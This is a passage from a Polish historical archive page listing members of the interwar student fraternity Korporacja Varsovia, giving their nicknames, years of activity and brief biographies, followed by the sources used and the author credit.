 102. Aleksander Wiśniewski, c. 1924, ps. “Łatek”, akt. 1924-25, starszy kand. sem. let. 1924, od sem. zim. 1925 barwiarz
 103. Ludomir Wodzinowski, ( - 2 września 1972) c. 1924, ps. “Kropidło”, akt. 1924-25
 104. Witold Wojciechowski, student PW, c. 1928, akt. 1928-29, od 1929 barwiarz
 105. Janusz Wróblewski, (27 kwietnia 1914 w Warszawie - 12 lutego 1991 w Newcastle w Australii) student SGH, ps. “Patefon”, po wojnie na emigracji w Australii, pracował jako bibliotekarz
 106. Witold Wróblewski, ( - 1939 pod Mławą) student PW, c. 1930, ps. “Muł”, akt. 1930-32, starszy kand. 1931, od 1932 barwiarz, sekretarz 1932/33, zmobilizowany w 1939, poległ w kampanii wrześniowej
 107. Andrzej Wrzesiński, (13 kwietnia 1907 - 19 września 2002) student PW 1931-33, SGGW, c. 1931, ps. “Bosambo”, akt. 1931-32, od 1932 barwiarz, magister inżynier rolnik, pochowany na cmentarzu parafialnym Kościoła pw. św. Wojciecha w Gdańsku
 108. Jan Wyszomirski, ( - 1945 w Warszawie) zamordowany w celach rabunkowych przez pijanego żołnierza Armii Czerwonej
 109. Jan Zdzienicki, c. 1938, ps. “Zdychakot”
 110. Kazimierz Zych, (1910-1986) student chemii PW, c. 1931, ps. “Ibis”, akt. 1931-32

Pieczęć Varsovii, początek lat 30-tych.
Listę członków opracowano na podstawie:

1) Leon Ter-Oganjan, Lista członków Polskiej Korporacji Akademickiej Varsovia (Warszawa) w latach 1922-1939, (w:) Polskie Korporacje Akademickie 1995, nr 10, s. 54 i n.,
2) biuletynów Warszawskiego Koła Międzykorporacyjnego z lat 1925-1933,
3) materiałów archiwalnych z Archiwum Korporacyjnego,
4) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Varsovia.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 14 II 2010 r.
Ostatnia zmiana: 1 IV 2020 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Polska Korporacja Akademicka Varsovia, (na:) www.archiwumkorporacyjne.pl, stan 1 IV 2020 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }